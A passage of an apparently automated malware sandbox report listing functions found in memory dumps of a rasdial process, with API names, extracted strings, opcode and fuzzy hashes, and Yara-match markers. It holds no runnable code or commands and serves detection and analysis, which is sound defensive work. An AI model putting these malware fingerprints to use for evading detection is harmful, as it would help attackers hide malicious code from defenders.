                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 249e6409d385289b368032140e8d88fddebd760730d9839c89c052f2f5e3e973
                                                      • Instruction ID: 7e6f40ecbb000914df4a4a3bf02960297b666c50f0833f3735ea6b986bf941ca
                                                      • Opcode Fuzzy Hash: 249e6409d385289b368032140e8d88fddebd760730d9839c89c052f2f5e3e973
                                                      • Instruction Fuzzy Hash: 13D05E71B803043BE744B7F5CC0AF56328D9B44768F488064B94CD72C3EAA5E14049A5
                                                      Function 02C507DB Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111), ref: 02C507E7
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                      • Instruction ID: 8b26f4b0b8ce8449af03c0eb31447300377f7cfc8c77921e55dab1a4a52f910f
                                                      • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                      • Instruction Fuzzy Hash: 65D0A76774001C35A60145946CC1DFEB71CDB846A5F004063FF08D1040D62189020AB0
                                                      Function 04B62C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: bed94606d5fe131f729184c029b336c75c7ac11d057c83f16867f4c3b0b9eb2e
                                                      • Instruction ID: 66f03ca5e4f83f0fce20247c702d14b5c2015621d5897325d6a40bb9f3bcc5b1
                                                      • Opcode Fuzzy Hash: bed94606d5fe131f729184c029b336c75c7ac11d057c83f16867f4c3b0b9eb2e
                                                      • Instruction Fuzzy Hash: A1B09B729015C5C9FB15F760460C7177900EBD0705F15C0F1D2130646E473CD1D1E175

                                                      Non-executed Functions

                                                      Function 049E04E8 Relevance: .1, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318397586.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_49e0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 78d71aa83f5f989b807599720f6a7f5bdc599571adb551d1a698cc180d8e52e8
                                                      • Instruction ID: 540373900b044906917c5d70cf46bf8dfc5a77776a4956fc972a399ab1444a06
                                                      • Opcode Fuzzy Hash: 78d71aa83f5f989b807599720f6a7f5bdc599571adb551d1a698cc180d8e52e8
                                                      • Instruction Fuzzy Hash: B441C67061CB1D8FD769AF6A9081676B3E6FB89304F50053DD98AC3252EBB0F8468785
                                                      Function 02C4DB8F Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 44295d915528b39c4561d85f5028c41108b0a9ce5b4428410bab197d34de4512
                                                      • Instruction ID: 8d8f8601d142c3a0d7f2a00fdf892a53dc54bf3482bf96148a8a650a6c23f2cd
                                                      • Opcode Fuzzy Hash: 44295d915528b39c4561d85f5028c41108b0a9ce5b4428410bab197d34de4512
                                                      • Instruction Fuzzy Hash: 3CB09226A1801402C128080D74412B0E3A4E397221D3032ABE808A31409046C452008D
                                                      Function 049EDE89 Relevance: 56.5, Strings: 45, Instructions: 214COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318397586.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_49e0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                      • API String ID: 0-3558027158
                                                      • Opcode ID: 251f9b2fdc045052bddd954a044f2f861e67d4074b838531f97e8c64120fc4a5
                                                      • Instruction ID: bb6649c74a9cdb857205bc872da333c4e25fdf488934d24f338e2bb18aede28e
                                                      • Opcode Fuzzy Hash: 251f9b2fdc045052bddd954a044f2f861e67d4074b838531f97e8c64120fc4a5
                                                      • Instruction Fuzzy Hash: C1914FF04482988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85
                                                      Function 04B62890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 20955e697b5c954da2e3b36f5b608e9ee83dcdbf2659a6cb3afb88a4c9be933f
                                                      • Instruction ID: 768c95fcf6223682599cf70198315c69e8ba2b0e0f6b2c8bb9dae7ab3057e6fe
                                                      • Opcode Fuzzy Hash: 20955e697b5c954da2e3b36f5b608e9ee83dcdbf2659a6cb3afb88a4c9be933f
                                                      • Instruction Fuzzy Hash: D85199A5B001567FEB14EFA88C9097EF7F8FB5820575481E9E469D7641E238FE408BA0
                                                      Function 04BD2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: c4f3a4e8b82559cc832d6a4ee702af2e644e993ff11cf21820cb39a07c03328a
                                                      • Instruction ID: 71686fdd456fadfa3929d3e3d96fe4ae7baef27379a58268564a793dffe93536
                                                      • Opcode Fuzzy Hash: c4f3a4e8b82559cc832d6a4ee702af2e644e993ff11cf21820cb39a07c03328a
                                                      • Instruction Fuzzy Hash: 04512771A00686AFDB38DF9CC99097FB7F8EB44204B4084DAE995D3641F674FA00CB60
                                                      Function 04B57630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04B946FC
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04B94742
                                                      • Execute=1, xrefs: 04B94713
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04B94725
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04B94655
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 04B94787
                                                      • ExecuteOptions, xrefs: 04B946A0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: 0b19533eaeec79e50d9fc276d45c63c7c303b1e9a3660a828570b02800aefddd
                                                      • Instruction ID: 022c3fd06af9e381cdb949651bd69852dc2eb4f06a0f364f8022551b21b1e76a
                                                      • Opcode Fuzzy Hash: 0b19533eaeec79e50d9fc276d45c63c7c303b1e9a3660a828570b02800aefddd
                                                      • Instruction Fuzzy Hash: EE51E735700219ABEF11AAA4EC99FEDB7A8EF04304F1400E9E905A71A0EF71BE458F51
                                                      Function 04BF6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction ID: ab1c07c96f520261947ac46e4ba1dc20d96e2dbb9829599e1a5e79700df2fa54
                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction Fuzzy Hash: 0B021771508341AFD705DF18C890A6FBBE5EFC8704F0489ADFA994B254DB31E90ACB92
                                                      Function 04B6B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 3a9962f079b68ad266e21a98fe8e83c2d54450cea0a03ee6069e75706d7d7337
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 3381B070E492699EDF248E68C8917FEBBB2EF45310F18419AD863E7291D73CB840CB50
                                                      Function 04BD20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: 6f2ba91973ed2de6d2fdcdf5f2805eecab3e7b5e1193caf1601fb7595750e874
                                                      • Instruction ID: ea80436bd6062cd7446c22511115a7e94d0955918633a384d264d74e323479c9
                                                      • Opcode Fuzzy Hash: 6f2ba91973ed2de6d2fdcdf5f2805eecab3e7b5e1193caf1601fb7595750e874
                                                      • Instruction Fuzzy Hash: FB215176A00159ABDB14DEB9CC41AAEBBF8EF58654F4441D6E915E3200F730AA118BA1
                                                      Function 04B4F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04B902E7
                                                      • RTL: Re-Waiting, xrefs: 04B9031E
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04B902BD
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: 8e5c5204275ddb8cded2bb89245fee76848e777ace6ec8ebb75195276ce7f211
                                                      • Instruction ID: 0abe716380940eed0992ea21f452a88db7d83708c95fda2d713d7f2334063567
                                                      • Opcode Fuzzy Hash: 8e5c5204275ddb8cded2bb89245fee76848e777ace6ec8ebb75195276ce7f211
                                                      • Instruction Fuzzy Hash: 67E19F306087419FDB25DF28C884B2AB7E0FB89314F144AA9F5A58B2E1E774F945DB42
                                                      Function 04B5BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 04B97BAC
                                                      • RTL: Resource at %p, xrefs: 04B97B8E
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04B97B7F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: cb167149c01a1f73034aeebbadbf795a5808dbacf2c9aabee8ed590e871ef5ce
                                                      • Instruction ID: 8b07e7fd5caa43a355e52830f5fa44cecb20fb6e0d42f117a943973a0f7763ae
                                                      • Opcode Fuzzy Hash: cb167149c01a1f73034aeebbadbf795a5808dbacf2c9aabee8ed590e871ef5ce
                                                      • Instruction Fuzzy Hash: 1F41F3317087029FDB20DE29C850B6AB7E5EF88714F100AADF95ADB690DB70F8058F91
                                                      Function 04B5B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B9728C
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 04B972C1
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04B97294
                                                      • RTL: Resource at %p, xrefs: 04B972A3
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 344c2dc5a6d0bced3d3922ad1acb3572b2b914ac773a09da928b0812c159af30
                                                      • Instruction ID: 6aa81f8cd124e28e604e456798e1f7c1001650df2e67192a8277e539e11a427c
                                                      • Opcode Fuzzy Hash: 344c2dc5a6d0bced3d3922ad1acb3572b2b914ac773a09da928b0812c159af30
                                                      • Instruction Fuzzy Hash: 9541F031714606ABEF24DE28CC41B6AB7E5FF89714F1006A9FD55AB250EB30F8128BD1
                                                      Function 04BD2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: 63bb9194447261d5a3b604d3e4f602dc9f9f52e663f4327ad1b27010e29b9797
                                                      • Instruction ID: 581cf1bef2aa72cba9dbaea15856100021e29a7681f34e71c84a637ac7c0e243
                                                      • Opcode Fuzzy Hash: 63bb9194447261d5a3b604d3e4f602dc9f9f52e663f4327ad1b27010e29b9797
                                                      • Instruction Fuzzy Hash: EC315076A002599FDB24DF29CC40BEEB7F8EB44614F9445D6E859E3240FB30BA448FA1
                                                      Function 04B67D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: 67e236405963f369078c49cb844ba76e8ad9070e8a55a96eaf25fc02db3bb898
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: 9191A871E002559BDF24DE69C890ABEB7A5FF44728F14499EE857E72C0EF3CA9408750
                                                      Function 04B29126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: 31ece63338df2002f641fc0e40ea63118201df22eb6b8608831e00a53f6f8cb4
                                                      • Instruction ID: bee860b594146e1ee2bc688469d50673a00b53f17d0c689f40b4812a108b6b83
                                                      • Opcode Fuzzy Hash: 31ece63338df2002f641fc0e40ea63118201df22eb6b8608831e00a53f6f8cb4
                                                      • Instruction Fuzzy Hash: C3812BB5E002699BDB35DF54CD44BEAB7B4AF49714F0041DAA91DB7240E730AE84CFA0
                                                      Function 04BACEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 04BACFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Qw@4Qw
                                                      • API String ID: 4062629308-2383119779
                                                      • Opcode ID: 75454959273d7af41c3bf9e1ccee3f5d0bf0919c59ed6ff7a571c6a0ac3f37fd
                                                      • Instruction ID: a0398c18bb50eb541020949c741c1b26e64b3a1228662ddc74a1e9b9dbab484e
                                                      • Opcode Fuzzy Hash: 75454959273d7af41c3bf9e1ccee3f5d0bf0919c59ed6ff7a571c6a0ac3f37fd
                                                      • Instruction Fuzzy Hash: EA41E571A04214DFEB21DFA5D940AAEBBF9FF45B08F0040AAE915DB260D734F811DB60
                                                      Function 049E3A1E Relevance: 5.0, Strings: 4, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318397586.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_49e0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0$:$age=$max-
                                                      • API String ID: 0-2033457386
                                                      • Opcode ID: 9df9835620c231900eac020cb54c3709134deacf32a4e2657ee8739806afede4
                                                      • Instruction ID: 8d281da60adfb2661982a6642b51e084950b137a96917e14eacde71c013431d4
                                                      • Opcode Fuzzy Hash: 9df9835620c231900eac020cb54c3709134deacf32a4e2657ee8739806afede4
                                                      • Instruction Fuzzy Hash: 8AD02E7400A3808BDB004F809A4A88ABB90FF88708FA0158CF49857213EB284641DB4B